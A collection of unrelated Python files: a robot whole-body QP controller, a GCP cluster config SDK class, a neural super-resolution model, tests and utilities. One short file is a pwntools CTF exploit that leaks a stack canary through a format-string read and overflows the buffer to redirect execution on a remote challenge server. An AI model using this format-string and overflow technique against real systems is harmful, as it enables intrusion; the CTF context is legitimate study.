np.dot(contact_jacobian, ni).transpose()),
-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(contact_jacobian, ni).transpose())),
axis=0)),
axis=1)
ineq_vec = np.concatenate((
-uf_vec,
np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) + np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) - self._trq_limit[:, 0],
-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) - np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) +
self._trq_limit[:, 1]))
else:
ineq_mat = np.concatenate(
(-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
self._mass_matrix),
np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
self._mass_matrix)),
axis=0)
ineq_vec = np.concatenate(
(np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) + np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) - self._trq_limit[:, 0],
-np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(ni.transpose(),
(self._coriolis + self._gravity))) - np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
jit_lmd_jidot_qdot) +
self._trq_limit[:, 1]))
# if verbose:
# print("eq_mat")
# print(eq_mat)
# print("eq_vec")
# print(eq_vec)
# print("ineq_mat")
# print(ineq_mat)
# print("ineq_vec")
# print(ineq_vec)
sol = solve_qp(
cost_mat,
cost_vec,
ineq_mat,
ineq_vec,
eq_mat,
eq_vec,
solver="quadprog",
verbose=True)
if contact_list is not None:
sol_q_ddot, sol_rf = sol[:self._n_q_dot], sol[self._n_q_dot:]
else:
sol_q_ddot, sol_rf = sol, None
if contact_list is not None:
joint_trq_cmd = np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(self._mass_matrix, sol_q_ddot) +
np.dot(ni.transpose(), (self._coriolis + self._gravity)) -
np.dot(np.dot(contact_jacobian, ni).transpose(), sol_rf))
else:
joint_trq_cmd = np.dot(
np.dot(sa_ni_trc_bar_tr, self._snf),
np.dot(self._mass_matrix, sol_q_ddot) +
np.dot(ni, (self._coriolis + self._gravity)))
joint_acc_cmd = np.dot(self._sa, sol_q_ddot)
if verbose:
print("joint_trq_cmd: ", joint_trq_cmd)
print("sol_q_ddot: ", sol_q_ddot)
print("sol_rf: ", sol_rf)
for i, task in enumerate(task_list):
j = task.jacobian
j_dot_q_dot = task.jacobian_dot_q_dot
x_ddot = task.op_cmd
print(task.target_id, " task")
print("des x ddot: ", x_ddot)
print("j*qddot_sol + Jdot*qdot: ",
np.dot(j, sol_q_ddot) + j_dot_q_dot)
if self._b_data_save:
self._data_saver.add('joint_trq_cmd', joint_trq_cmd)
self._data_saver.add('joint_acc_cmd', joint_acc_cmd)
self._data_saver.add('rf_cmd', sol_rf)
return joint_trq_cmd, joint_acc_cmd, sol_rf
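# --- Illustrative usage sketch (an editorial addition, not part of the module).
# The dynamics terms and the task/contact/internal-constraint lists are assumed
# to be computed elsewhere (e.g. by a robot model); only the call order from the
# class docstring (update_setting --> solve) is shown here.
def _example_ihwbc_step(ihwbc, mass_matrix, mass_matrix_inv, coriolis, gravity,
                        task_list, contact_list, internal_constraint_list):
    ihwbc.update_setting(mass_matrix, mass_matrix_inv, coriolis, gravity)
    joint_trq_cmd, joint_acc_cmd, rf_cmd = ihwbc.solve(
        task_list, contact_list, internal_constraint_list, rf_des=None, verbose=False)
    return joint_trq_cmd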
|
105876
|
from qds_sdk.cloud.cloud import Cloud
class GcpCloud(Cloud):
'''
qds_sdk.cloud.GcpCloud is the class which stores information about gcp cloud config settings.
    The objects of this class can be used to set gcp cloud_config settings while creating/updating/cloning a cluster.
'''
def __init__(self):
self.compute_config = {}
self.location = {}
self.network_config = {}
self.storage_config = {}
self.cluster_composition = {}
def set_cloud_config(self,
qsa_client_id=None,
customer_project_id=None,
qsa_client_email=None,
qsa_private_key_id=None,
qsa_private_key=None,
comp_client_email=None,
inst_client_email=None,
use_account_compute_creds=None,
gcp_region=None,
gcp_zone=None,
storage_disk_size_in_gb=None,
storage_disk_count=None,
storage_disk_type=None,
bastion_node_public_dns=None,
vpc_id=None,
subnet_id=None,
master_preemptible=None,
min_nodes_preemptible=None,
min_nodes_preemptible_percentage=None,
autoscaling_nodes_preemptible=None,
autoscaling_nodes_preemptible_percentage=None):
'''
Args:
qsa_client_id: Compute client id for gcp cluster
customer_project_id: Compute project id for gcp cluster
qsa_client_email: Compute client email for gcp cluster
qsa_private_key_id: Compute private key id for gcp cluster
qsa_private_key: Compute private key for gcp cluster
comp_client_email: Client compute service account email
inst_client_email: Client storage/instance service account email
use_account_compute_creds: Set it to true to use the account's compute
                credentials for all clusters of the account. The default value is false.
gcp_region: Region for gcp cluster
bastion_node_public_dns: public dns name of the bastion node.
Required only if cluster is in a private subnet.
vpc_id: Vpc id for gcp cluster
subnet_id: Subnet id for gcp cluster
master_preemptible: if the master node is preemptible
min_nodes_preemptible: if the min nodes are preemptible
min_nodes_preemptible_percentage: percentage of min nodes that are preemptible
autoscaling_nodes_preemptible: if the autoscaling nodes are preemptible
autoscaling_nodes_preemptible_percentage: percentage of autoscaling nodes that are preemptible
'''
self.set_compute_config(use_account_compute_creds, qsa_client_id, customer_project_id, qsa_client_email,
qsa_private_key_id, qsa_private_key, comp_client_email)
self.set_location(gcp_region, gcp_zone)
self.set_network_config(bastion_node_public_dns, vpc_id, subnet_id)
self.set_storage_config(inst_client_email, storage_disk_size_in_gb, storage_disk_count, storage_disk_type)
self.set_cluster_composition(master_preemptible, min_nodes_preemptible, min_nodes_preemptible_percentage,
autoscaling_nodes_preemptible, autoscaling_nodes_preemptible_percentage)
def set_compute_config(self,
use_account_compute_creds=None,
qsa_client_id=None,
customer_project_id=None,
qsa_client_email=None,
qsa_private_key_id=None,
qsa_private_key=None,
comp_client_email=None):
self.compute_config['use_account_compute_creds'] = use_account_compute_creds
self.compute_config['qsa_client_id'] = qsa_client_id
self.compute_config['customer_project_id'] = customer_project_id
self.compute_config['qsa_client_email'] = qsa_client_email
self.compute_config['qsa_private_key_id'] = qsa_private_key_id
self.compute_config['qsa_private_key'] = qsa_private_key
self.compute_config['comp_client_email'] = comp_client_email
def set_location(self,
gcp_region=None,
gcp_zone=None,
):
self.location['region'] = gcp_region
self.location['zone'] = gcp_zone
def set_network_config(self,
bastion_node_public_dns=None,
vpc_id=None,
subnet_id=None):
self.network_config['bastion_node_public_dns'] = bastion_node_public_dns
self.network_config['network'] = vpc_id
self.network_config['subnet'] = subnet_id
def set_storage_config(self,
inst_client_email=None,
storage_disk_size_in_gb=None,
storage_disk_count=None,
storage_disk_type=None
):
self.storage_config['inst_client_email'] = inst_client_email
self.storage_config['disk_size_in_gb'] = storage_disk_size_in_gb
self.storage_config['disk_count'] = storage_disk_count
self.storage_config['disk_type'] = storage_disk_type
def set_cluster_composition(self,
master_preemptible=None,
min_nodes_preemptible=None,
min_nodes_preemptible_percentage=None,
autoscaling_nodes_preemptible=None,
autoscaling_nodes_preemptible_percentage=None):
self.cluster_composition['master'] = {}
self.cluster_composition['master']['preemptible'] = master_preemptible
self.cluster_composition['min_nodes'] = {}
self.cluster_composition['min_nodes']['preemptible'] = min_nodes_preemptible
self.cluster_composition['min_nodes']['percentage'] = min_nodes_preemptible_percentage
self.cluster_composition['autoscaling_nodes'] = {}
self.cluster_composition['autoscaling_nodes']['preemptible'] = autoscaling_nodes_preemptible
self.cluster_composition['autoscaling_nodes']['percentage'] = autoscaling_nodes_preemptible_percentage
def set_cloud_config_from_arguments(self, arguments):
self.set_cloud_config(qsa_client_id=arguments.qsa_client_id,
customer_project_id=arguments.customer_project_id,
qsa_client_email=arguments.qsa_client_email,
qsa_private_key_id=arguments.qsa_private_key_id,
qsa_private_key=arguments.qsa_private_key,
inst_client_email=arguments.inst_client_email,
comp_client_email=arguments.comp_client_email,
use_account_compute_creds=arguments.use_account_compute_creds,
gcp_region=arguments.gcp_region,
gcp_zone=arguments.gcp_zone,
storage_disk_size_in_gb=arguments.storage_disk_size_in_gb,
storage_disk_count=arguments.storage_disk_count,
storage_disk_type=arguments.storage_disk_type,
bastion_node_public_dns=arguments.bastion_node_public_dns,
vpc_id=arguments.vpc_id,
subnet_id=arguments.subnet_id,
master_preemptible=arguments.master_preemptible,
min_nodes_preemptible=arguments.min_nodes_preemptible,
min_nodes_preemptible_percentage=arguments.min_nodes_preemptible_percentage,
autoscaling_nodes_preemptible=arguments.autoscaling_nodes_preemptible,
autoscaling_nodes_preemptible_percentage=arguments.autoscaling_nodes_preemptible_percentage)
def create_parser(self, argparser):
# compute settings parser
compute_config = argparser.add_argument_group("compute config settings")
compute_creds = compute_config.add_mutually_exclusive_group()
compute_creds.add_argument("--enable-account-compute-creds",
dest="use_account_compute_creds",
action="store_true",
default=None,
help="to use account compute credentials")
compute_creds.add_argument("--disable-account-compute-creds",
dest="use_account_compute_creds",
action="store_false",
default=None,
help="to disable account compute credentials")
compute_config.add_argument("--qsa-client-id",
dest="qsa_client_id",
default=None,
help="qsa client id for gcp cluster")
compute_config.add_argument("--customer-project-id",
dest="customer_project_id",
default=None,
help="customer project id for gcp cluster")
compute_config.add_argument("--qsa-client-email",
dest="qsa_client_email",
default=None,
help="qsa client email for gcp cluster")
compute_config.add_argument("--qsa-private-key-id",
dest="qsa_private_key_id",
default=None,
help="qsa private key id for gcp cluster")
compute_config.add_argument("--qsa-private-key",
dest="qsa_private_key",
default=None,
help="qsa private key for gcp cluster")
compute_config.add_argument("--compute-client-email",
dest="comp_client_email",
default=None,
help="client compute service account email")
# location settings parser
location_group = argparser.add_argument_group("location config settings")
location_group.add_argument("--gcp-region",
dest="gcp_region",
help="region to create the cluster in")
location_group.add_argument("--gcp-zone",
dest="gcp_zone",
help="zone to create the cluster in")
# network settings parser
network_config_group = argparser.add_argument_group("network config settings")
network_config_group.add_argument("--bastion-node-public-dns",
dest="bastion_node_public_dns",
help="public dns name of the bastion node. Required only if cluster is in private subnet")
network_config_group.add_argument("--vpc-id",
dest="vpc_id",
help="vpc id to create the cluster in")
network_config_group.add_argument("--subnet-id",
dest="subnet_id",
help="subnet id to create the cluster in")
# storage config settings parser
storage_config = argparser.add_argument_group("storage config settings")
storage_config.add_argument("--storage-client-email",
dest="inst_client_email",
default=None,
help="client storage service account email")
storage_config.add_argument("--storage-disk-size-in-gb",
dest="storage_disk_size_in_gb",
default=None,
help="disk size in gb for gcp cluster")
storage_config.add_argument("--storage-disk-count",
dest="storage_disk_count",
default=None,
help="disk count for gcp cluster")
storage_config.add_argument("--storage-disk-type",
dest="storage_disk_type",
default=None,
help="disk type for gcp cluster")
# cluster composition settings parser
cluster_composition = argparser.add_argument_group("cluster composition settings")
cluster_composition.add_argument("--master-preemptible",
dest="master_preemptible",
action="store_true",
default=None,
help="if the master node is preemptible")
cluster_composition.add_argument("--min-nodes-preemptible",
dest="min_nodes_preemptible",
action="store_true",
default=None,
help="if the min nodes are preemptible")
cluster_composition.add_argument("--min-nodes-preemptible-percentage",
dest="min_nodes_preemptible_percentage",
type=int,
default=None,
help="percentage of min nodes that are preemptible")
cluster_composition.add_argument("--autoscaling-nodes-preemptible",
dest="autoscaling_nodes_preemptible",
action="store_true",
default=None,
help="if the autoscaling nodes are preemptible")
cluster_composition.add_argument("--autoscaling-nodes-preemptible-percentage",
dest="autoscaling_nodes_preemptible_percentage",
type=int,
default=None,
help="percentage of autoscaling nodes that are preemptible")
|
105944
|
import jinja2
from lib.notify.all_notifiers import get_notifier_class, DEFAULT_NOTIFIER
from logic import user as user_logic
from app.db import with_session
@with_session
def notify_user(user, template_name, template_params, notifier_name=None, session=None):
if notifier_name is None:
notification_preference = user_logic.get_user_settings(
user.id, "notification_preference", session=session
)
notifier_name = (
notification_preference.value
if notification_preference is not None
else DEFAULT_NOTIFIER
)
if notifier_name is None:
return
notifier = get_notifier_class(notifier_name)
markdown_message = render_message(template_name, template_params)
notifier.notify(user=user, message=markdown_message)
def render_message(template_name, context):
jinja_env = jinja2.Environment(
loader=jinja2.FileSystemLoader("./querybook/notification_templates/")
)
template = jinja_env.get_template(f"{template_name}.md")
return template.render(context)
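# Illustrative call (template name and params are hypothetical; the real templates
# live under ./querybook/notification_templates/):
#   notify_user(user, "query_completion", {"query_title": "Daily revenue"})
# This picks the user's preferred notifier (falling back to DEFAULT_NOTIFIER), renders
# query_completion.md with Jinja2, and sends the resulting markdown message.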
|
105950
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from .base import * # pylint: disable=wildcard-import
from .grid_search import * # pylint: disable=wildcard-import
|
105972
|
import os
import sys
sys.path.append('../')
import numpy as np
import xarray as xr
import matplotlib.pyplot as plt
import cartopy
import cartopy.crs as ccrs
import pygsp as pg
from modules.my_io import readDatasets
from modules import xsphere
# Plotting options
import matplotlib
matplotlib.use('cairo') # Cairo
matplotlib.rcParams["figure.facecolor"] = "white"
matplotlib.rcParams["savefig.facecolor"] = "white" # (1,1,1,0)
matplotlib.rcParams["savefig.edgecolor"] = 'none'
##-----------------------------------------------------------------------------.
# Define directories
data_dir = "/data/weather_prediction/data"
figs_dir = "/data/weather_prediction/figs"
##-----------------------------------------------------------------------------.
# Define samplings
sampling_names = [
# 400 km
'Healpix_400km',
'Icosahedral_400km',
'Cubed_400km',
'O24',
'Equiangular_400km',
]
# Define samplings title
samplings_labels_dict = {
# 400 km
'Healpix_400km': 'Healpix',
'Icosahedral_400km': 'Icosahedral' ,
'Cubed_400km' : 'Cubed Sphere',
'O24' : 'Reduced Gaussian Grid',
'Equiangular_400km' : 'Equiangular Grid',
}
# Define reference and projection CRS
crs_ref = ccrs.Geodetic()
crs_proj = ccrs.Orthographic(central_longitude=0.0, central_latitude=90.0) # from the North Pole
##----------------------------------------------------------------------------.
### Plot meshes
fig, axes = plt.subplots(2, 3, subplot_kw=dict(projection=crs_proj), figsize=(12,10))
for ax, sampling_name in zip(axes.flat, sampling_names):
# Load netCDF4 Datasets
data_sampling_dir = os.path.join(data_dir, sampling_name)
ds = readDatasets(data_dir=data_sampling_dir, feature_type='static')
ds = ds.sphere.add_SphericalVoronoiMesh(x='lon',y='lat')
# Plot mesh
ds.sphere.plot_mesh(ax = ax,
transform = crs_ref,
add_background = True,
antialiaseds = True,
facecolors = 'none',
edgecolors = "black",
linewidths = 0.5,
alpha = 0.8)
ax.set_title(samplings_labels_dict[sampling_name])
fig.tight_layout()
fig.savefig(os.path.join(figs_dir, "Meshes.png"))
##----------------------------------------------------------------------------.
|
105978
|
from formation import fields as F
from formation.field_types import MultiValueField
from formation.fields import get_field_index
from formation.form_base import Form
from formation.forms import county_form_selector
EDITABLE_FIELDS = {
F.ContactPreferences,
F.FirstName,
F.MiddleName,
F.LastName,
F.Aliases,
F.PhoneNumberField,
F.AlternatePhoneNumberField,
F.AddressField,
F.DriverLicenseOrIDNumber,
F.EmailField,
F.DateOfBirthField,
F.SocialSecurityNumberField,
}
SENSITIVE_FIELD_LABELS = (
F.SocialSecurityNumberField().get_display_label(),
F.DriverLicenseOrIDNumber().get_display_label(),
)
def get_edit_form_class_for_user_and_submission(user, submission):
    # get all orgs for submission
all_county_slugs = submission.organizations.values_list(
'county__slug', flat=True)
# get combined form spec for all orgs
all_county_form_spec = county_form_selector.get_combined_form_spec(
counties=all_county_slugs)
county_field_set = all_county_form_spec.fields
if not user.is_staff:
user_county_slug = user.profile.organization.county.slug
user_county_spec = county_form_selector.get_combined_form_spec(
counties=[user_county_slug])
county_field_set = user_county_spec.fields
form_field_set = county_field_set & EDITABLE_FIELDS
form_fields = sorted(list(form_field_set), key=get_field_index)
# get union of required fields from all form specs
# this, intersected with form_fields, is the set of required fields for
# our form
required_fields = list(
all_county_form_spec.required_fields & form_field_set)
parent_classes = (Form,)
class_attributes = dict(
fields=form_fields,
required_fields=required_fields,
validators=list(all_county_form_spec.validators))
return type('CombinedEditForm', parent_classes, class_attributes)
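# Illustrative shape of the generated class (field names here are hypothetical):
#   class CombinedEditForm(Form):
#       fields = [F.FirstName, F.LastName, ...]   # county spec fields ∩ EDITABLE_FIELDS, in form order
#       required_fields = [...]                    # required fields restricted to the fields above
#       validators = [...]                         # validators from the combined county spec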
def get_changed_data_from_form(form):
"""Returns a dictionary with keys of all changed fields
and values that are a dict with 'before' and 'after' keys
values of 'before' and 'after' are display values
for example:
{
'First name': {
'before': 'George',
'after': 'Jorge'
},
'Date of birth': {
'before': 'February/6/1791',
'after': '2/6/1791'}
}
}
Expects fields prefixed with 'existing_' in order to make that comparison
"""
changes = {}
existing_data_form = form.__class__(
form.raw_input_data, prefix='existing_', validate=True,
skip_validation_parse_only=True)
for field in form.iter_fields():
after = field.get_display_value()
existing_data_field = existing_data_form.fields[field.context_key]
before = existing_data_field.get_display_value()
if before != after:
changes[field.get_display_label()] = {
'before': before,
'after': after}
return changes
|
105979
|
from pwn import *
elf=ELF('./binary_200')
#remote server has no elf named binary_200, so we load local elf
r=remote('bamboofox.cs.nctu.edu.tw',22002)
print 'start'
#r=process('./binary_200')
sysadr=elf.symbols['canary_protect_me']
#use gdb to justify canary in args of printf
r.sendline('%15$08x')
print 'leak canary start'
canary=r.recv()[:8]
print 'Canary is 0x'+canary
#Bypass canary leaked and attack the stack
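# payload layout (derived from the offsets below): 0x28 bytes of filler up to the
# canary, the leaked 4-byte canary (hex-decoded and reversed to little-endian),
# 0xc bytes of padding up to the saved return address, then the address of
# canary_protect_me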
payload='A'*(0x2c-0x4)+canary.decode("hex")[::-1]+'a'*0xc+p32(sysadr)
r.sendline(payload)
r.interactive()
|
105995
|
from collections import namedtuple
def _namedtuple(typename, field_names):
"""Fixes hashing for different tuples with same content
"""
base = namedtuple(typename, field_names)
def __hash__(self):
return hash((self.__class__, super(base, self).__hash__()))
return type(typename, (base,), {
'__slots__': (),
'__hash__': __hash__,
})
SCALAR = _namedtuple('SCALAR', 'name')
OBJECT = _namedtuple('OBJECT', 'name')
DIRECTIVE = _namedtuple('DIRECTIVE', 'name')
INPUT_OBJECT = _namedtuple('INPUT_OBJECT', 'name')
LIST = _namedtuple('LIST', 'of_type')
NON_NULL = _namedtuple('NON_NULL', 'of_type')
FieldIdent = _namedtuple('FieldIdent', 'node, name')
FieldArgIdent = _namedtuple('FieldArgIdent', 'node, field, name')
InputObjectFieldIdent = _namedtuple('InputObjectFieldIdent', 'name, key')
DirectiveArgIdent = _namedtuple('DirectiveArgIdent', 'name, arg')
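# Illustrative check (not part of the original module): with plain namedtuples,
# SCALAR('Int') and OBJECT('Int') would collapse to one set entry because tuple
# hashing ignores the class; the __hash__ override above mixes the class in.
if __name__ == '__main__':
    kinds = {SCALAR('Int'), OBJECT('Int')}
    print(len(kinds))  # 2 with the class-aware hash; a plain namedtuple would give 1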
|
106000
|
import torch
import torch.nn as nn
import numpy as np
import torch.nn.functional as F
__all__ = ['FixupResNet', 'fixup_resnet34', 'fixup_resnet34_v2']
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv5x5(in_planes, out_planes, stride=1):
"""5x5 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=5, stride=stride,
padding=2, bias=False)
def conv7x7(in_planes, out_planes, stride=1):
"""7x7 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=7, stride=stride,
padding=3, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class FixupBasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, conv_create=conv3x3):
super(FixupBasicBlock, self).__init__()
# Both self.conv1 and self.downsample layers downsample the input when stride != 1
self.bias1a = nn.Parameter(torch.zeros(1))
self.conv1 = conv_create(inplanes, planes, stride)
self.bias1b = nn.Parameter(torch.zeros(1))
self.lrelu = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.bias2a = nn.Parameter(torch.zeros(1))
self.conv2 = conv_create(planes, planes)
self.scale = nn.Parameter(torch.ones(1))
self.bias2b = nn.Parameter(torch.zeros(1))
self.downsample = downsample
self.stride = stride
def forward(self, x):
identity = x
out = self.conv1(x + self.bias1a)
out = self.lrelu(out + self.bias1b)
out = self.conv2(out + self.bias2a)
out = out * self.scale + self.bias2b
if self.downsample is not None:
identity = self.downsample(x + self.bias1a)
out += identity
out = self.lrelu(out)
return out
class FixupResNet(nn.Module):
def __init__(self, block, layers, upscale_applications=2, num_filters=64, inject_noise=False):
super(FixupResNet, self).__init__()
self.inject_noise = inject_noise
self.num_layers = sum(layers) + layers[-1] * (upscale_applications - 1) # The last layer is applied repeatedly to achieve high level SR.
self.inplanes = num_filters
self.upscale_applications = upscale_applications
# Part 1 - Process raw input image. Most denoising should appear here and this should be the most complicated
# part of the block.
self.conv1 = nn.Conv2d(3, num_filters, kernel_size=5, stride=1, padding=2,
bias=False)
self.bias1 = nn.Parameter(torch.zeros(1))
self.lrelu = nn.LeakyReLU(negative_slope=0.2, inplace=True)
self.layer1 = self._make_layer(block, num_filters, layers[0], stride=1)
self.skip1 = nn.Conv2d(num_filters, 3, kernel_size=5, stride=1, padding=2, bias=False)
self.skip1_bias = nn.Parameter(torch.zeros(1))
# Part 2 - This is the upsampler core. It consists of a normal multiplicative conv followed by several residual
# convs which are intended to repair artifacts caused by 2x interpolation.
        # This core layer should by itself accomplish 2x super-resolution; it is applied
        # repeatedly to reach the requested SR factor.
self.nf2 = int(num_filters/4)
# This part isn't repeated. It de-filters the output from the previous step to fit the filter size used in the
# upsampler-conv.
self.upsampler_conv = nn.Conv2d(num_filters, self.nf2, kernel_size=3, stride=1, padding=1, bias=False)
self.uc_bias = nn.Parameter(torch.zeros(1))
self.inplanes = self.nf2
if layers[1] > 0:
# This is the repeated part.
self.layer2 = self._make_layer(block, int(self.nf2), layers[1], stride=1, conv_type=conv5x5)
self.skip2 = nn.Conv2d(self.nf2, 3, kernel_size=5, stride=1, padding=2, bias=False)
self.skip2_bias = nn.Parameter(torch.zeros(1))
self.final_defilter = nn.Conv2d(self.nf2, 3, kernel_size=5, stride=1, padding=2, bias=True)
self.bias2 = nn.Parameter(torch.zeros(1))
for m in self.modules():
if isinstance(m, FixupBasicBlock):
nn.init.normal_(m.conv1.weight, mean=0, std=np.sqrt(2 / (m.conv1.weight.shape[0] * np.prod(m.conv1.weight.shape[2:]))) * self.num_layers ** (-0.5))
nn.init.constant_(m.conv2.weight, 0)
if m.downsample is not None:
nn.init.normal_(m.downsample.weight, mean=0, std=np.sqrt(2 / (m.downsample.weight.shape[0] * np.prod(m.downsample.weight.shape[2:]))))
def _make_layer(self, block, planes, blocks, stride=1, conv_type=conv3x3):
defilter = None
if self.inplanes != planes * block.expansion:
defilter = conv1x1(self.inplanes, planes * block.expansion, stride)
layers = []
layers.append(block(self.inplanes, planes, stride, defilter))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, conv_create=conv_type))
return nn.Sequential(*layers)
def forward(self, x):
if self.inject_noise:
rand_feature = torch.randn_like(x)
x = x + rand_feature * .1
x = self.conv1(x)
x = self.lrelu(x + self.bias1)
x = self.layer1(x)
skip_lo = self.skip1(x) + self.skip1_bias
x = self.lrelu(self.upsampler_conv(x) + self.uc_bias)
if self.upscale_applications > 0:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
skip_med = self.skip2(x) + self.skip2_bias
else:
skip_med = skip_lo
if self.upscale_applications > 1:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
x = self.final_defilter(x) + self.bias2
return x, skip_med, skip_lo
class FixupResNetV2(FixupResNet):
def __init__(self, **kwargs):
super(FixupResNetV2, self).__init__(**kwargs)
# Use one unified filter-to-image stack, not the previous skip stacks.
self.skip1 = None
self.skip1_bias = None
self.skip2 = None
self.skip2_bias = None
# The new filter-to-image stack will be 2 conv layers deep, not 1.
self.final_process = nn.Conv2d(self.nf2, self.nf2, kernel_size=5, stride=1, padding=2, bias=True)
self.bias2 = nn.Parameter(torch.zeros(1))
self.fp_bn = nn.BatchNorm2d(self.nf2)
self.final_defilter = nn.Conv2d(self.nf2, 3, kernel_size=3, stride=1, padding=1, bias=True)
self.bias3 = nn.Parameter(torch.zeros(1))
def filter_to_image(self, filter):
x = self.final_process(filter) + self.bias2
x = self.lrelu(self.fp_bn(x))
x = self.final_defilter(x) + self.bias3
return x
def forward(self, x):
if self.inject_noise:
rand_feature = torch.randn_like(x)
x = x + rand_feature * .1
x = self.conv1(x)
x = self.lrelu(x + self.bias1)
x = self.layer1(x)
x = self.lrelu(self.upsampler_conv(x) + self.uc_bias)
skip_lo = self.filter_to_image(x)
if self.upscale_applications > 0:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
skip_med = self.filter_to_image(x)
if self.upscale_applications > 1:
x = F.interpolate(x, scale_factor=2.0, mode='nearest')
x = self.layer2(x)
if self.upscale_applications == 2:
x = self.filter_to_image(x)
elif self.upscale_applications == 1:
x = skip_med
skip_med = skip_lo
skip_lo = None
elif self.upscale_applications == 0:
x = skip_lo
skip_lo = None
skip_med = None
return x, skip_med, skip_lo
def fixup_resnet34(nb_denoiser=20, nb_upsampler=10, **kwargs):
"""Constructs a Fixup-ResNet-34 model.
"""
model = FixupResNet(FixupBasicBlock, [nb_denoiser, nb_upsampler], **kwargs)
return model
def fixup_resnet34_v2(nb_denoiser=20, nb_upsampler=10, **kwargs):
"""Constructs a Fixup-ResNet-34 model.
"""
kwargs['block'] = FixupBasicBlock
kwargs['layers'] = [nb_denoiser, nb_upsampler]
model = FixupResNetV2(**kwargs)
return model
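# Minimal usage sketch (layer counts and filter width here are illustrative, not the
# values used in any original training setup): build the 34-style model and push a
# dummy low-resolution image through it.
if __name__ == '__main__':
    net = fixup_resnet34(nb_denoiser=4, nb_upsampler=2, num_filters=32)
    lr = torch.randn(1, 3, 32, 32)
    sr, skip_med, skip_lo = net(lr)
    # expect 4x, 2x and 1x spatial sizes: 128x128, 64x64 and 32x32
    print(sr.shape, skip_med.shape, skip_lo.shape)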
|
106060
|
import logging
import psutil
from icrawl_plugin import IHostCrawler
from utils.features import CpuFeature
logger = logging.getLogger('crawlutils')
class CpuHostCrawler(IHostCrawler):
def get_feature(self):
return 'cpu'
def crawl(self, **kwargs):
logger.debug('Crawling %s' % (self.get_feature()))
for (idx, cpu) in enumerate(psutil.cpu_times_percent(percpu=True)):
feature_attributes = CpuFeature(
cpu.idle,
cpu.nice,
cpu.user,
cpu.iowait,
cpu.system,
cpu.irq,
cpu.steal,
100 - int(cpu.idle),
)
feature_key = '{0}-{1}'.format('cpu', idx)
yield (feature_key, feature_attributes, 'cpu')
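# Each crawl() call yields one entry per logical CPU, e.g. (values illustrative):
#   ('cpu-0', CpuFeature(92.1, 0.0, 5.3, 0.4, 2.2, 0.0, 0.0, 7), 'cpu')
# where the positional values are the idle, nice, user, iowait, system, irq and steal
# percentages followed by the derived overall utilisation.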
|
106077
|
import unittest
from collections import namedtuple
from operator import attrgetter, itemgetter
from foil.order import partition_ordered, partition
MockTuple = namedtuple('MockTuple', ('a', 'b'))
def is_even(x):
    return x % 2 == 0
class TestPartitionOrdered(unittest.TestCase):
def test_partition_by_attribute(self):
data = [{'a': 5, 'b': 8}, {'a': 5, 'b': 7}, {'a': 4, 'b': 4}]
tups = [MockTuple(**d) for d in data]
expected = [(5, [MockTuple(a=5, b=8), MockTuple(a=5, b=7)]),
(4, [MockTuple(a=4, b=4)])]
result = list(partition_ordered(tups, key=attrgetter('a')))
self.assertSequenceEqual(expected, result)
def test_partition_by_item(self):
data = ['123', '234', '221', '210', '780', '822']
expected = [('1', ['123']),
('2', ['234', '221', '210']),
('7', ['780']),
('8', ['822'])]
result = list(partition_ordered(data, key=itemgetter(0)))
self.assertEqual(expected, result)
class TestPartition(unittest.TestCase):
def test_partition(self):
expected_true = [0, 2]
expected_false = [1, 3]
result_false, result_true = partition(is_even, range(0, 4))
self.assertEqual(expected_true, list(result_true))
self.assertEqual(expected_false, list(result_false))
|
106098
|
import pytest
from copy import deepcopy
from unittest.mock import patch
from pycliarr.api.radarr import RadarrCli, RadarrMovieItem
from pycliarr.api.exceptions import RadarrCliError
TEST_ROOT_PATH = [{"path": "some/path/", "id": 1},{"path": "yet/otherpath/", "id": 3}]
TEST_JSON = {'somefield': "some value"}
TEST_MOVIE = {'title': "some movie", "year": 2020}
TEST_HOST = "http://example.com"
TEST_APIKEY = "<KEY>"
TEST_MOVIEINFO = {
"title": "some movie",
"sortTitle": "",
"sizeOnDisk": 0,
"overview": "",
"inCinemas": None,
"physicalRelease": None,
"status": "",
"images": [],
"website": "",
"downloaded": False,
"year": 0,
"hasFile": False,
"youTubeTrailerId": "",
"studio": "",
"path": "",
"rootFolderPath": "",
"profileId": 0,
"monitored": True,
"minimumAvailability": "",
"isAvailable": "",
"folderName": "",
"runtime": 0,
"cleanTitle": "",
"imdbId": "",
"tmdbId": 0,
"titleSlug": "",
"certification": "",
"genres": [],
"tags": [],
"added": None,
"ratings": {},
"collection": {},
"alternativeTitles": [],
"qualityProfileId": 0,
"id": 0,
}
@pytest.fixture
def cli():
return RadarrCli(TEST_HOST, TEST_APIKEY)
@patch("pycliarr.api.radarr.BaseCliMediaApi.get_item", return_value=TEST_MOVIE)
def test_get_movie(mock_base, cli):
res = cli.get_movie()
